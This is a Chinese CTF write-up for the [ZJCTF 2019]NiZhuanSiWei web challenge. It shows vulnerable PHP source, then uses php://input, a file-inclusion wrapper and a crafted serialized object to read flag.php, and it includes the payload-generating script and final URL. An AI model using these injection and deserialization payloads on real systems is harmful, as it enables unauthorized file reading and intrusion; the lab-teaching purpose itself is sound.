BUUCTF - Web - [ZJCTF 2019]NiZhuanSiWei

最新推荐文章于 2024-06-22 23:02:08 发布

1ta-chi

最新推荐文章于 2024-06-22 23:02:08 发布

阅读量1.6k

点赞数

分类专栏： ctf Writeup 文章标签：前端 php web安全

本文链接：https://blog.csdn.net/suichi314/article/details/122206031

版权

ctf Writeup 专栏收录该内容

26 篇文章 2 订阅

订阅专栏

本文介绍了如何利用PHP中的伪协议和序列化技巧来解决一个CTF挑战。通过分析源码，发现需要设置特定的字符串和文件路径，以及正确地序列化一个类来获取flag。在payload中，创建了一个类并序列化它，将其作为$password参数传递，成功绕过限制并显示了flag。

摘要由CSDN通过智能技术生成

[ZJCTF 2019]NiZhuanSiWei

源码

<?php  
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); 
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?>

$text 中的字符串必须是"welcome to the zjctf"，可以php://input写入
include($file)想到伪协议，提示 useless.php

抓包读取一下useless.php
在这里插入图片描述

useless.php

得到uesless.php的源码

<?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>

故$password应为该类的序列化字符串，其中$file属性的值应为flag.php

payload

脚本

<?php
class Flag {
    public $file = 'flag.php';
}
$a = new Flag;
echo urlencode(serialize($a));

# O%3A4%3A%22Flag%22%3A1%3A%7Bs%3A4%3A%22file%22%3Bs%3A8%3A%22flag.php%22%3B%7D

payload：?file=useless.php&text=php://input&password=O%3A4%3A%22Flag%22%3A1%3A%7Bs%3A4%3A%22file%22%3Bs%3A8%3A%22flag.php%22%3B%7D
在回显页面源码中看到flag
在这里插入图片描述